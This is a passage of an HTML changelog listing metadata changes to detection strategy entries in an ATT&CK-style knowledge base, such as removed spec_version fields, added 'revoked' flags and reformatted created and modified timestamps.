Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:26:14.331Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.391000+00:00</td></tr></tbody></table></details><hr><h4>[DET0546] Detection of Abused or Compromised Cloud Accounts for Access and Persistence</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0884] Detection of Acquire Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0895] Detection of Acquire Infrastructure</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0830] Detection of Active Scanning</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0034] Detection of Adversarial Process Discovery Behavior</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0223] Detection of Adversary Abuse of Software Deployment Tools</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0247] Detection of Adversary Use of Unused or Unsupported Cloud Regions (IaaS)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0414] Detection of AppleScript-Based Execution on macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0097] Detection of Application Window Enumeration via API or Scripting</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0842] Detection of Artificial Intelligence</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0918] Detection of Audio-Visual Content</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T14:58:03.627Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 14:58:03.627000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:23:36.872Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0554] Detection of Bluetooth-Based Data Exfiltration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0883] Detection of Botnet</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0837] Detection of Botnet</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0855] Detection of Business Relationships</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0809] Detection of CDNs</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: 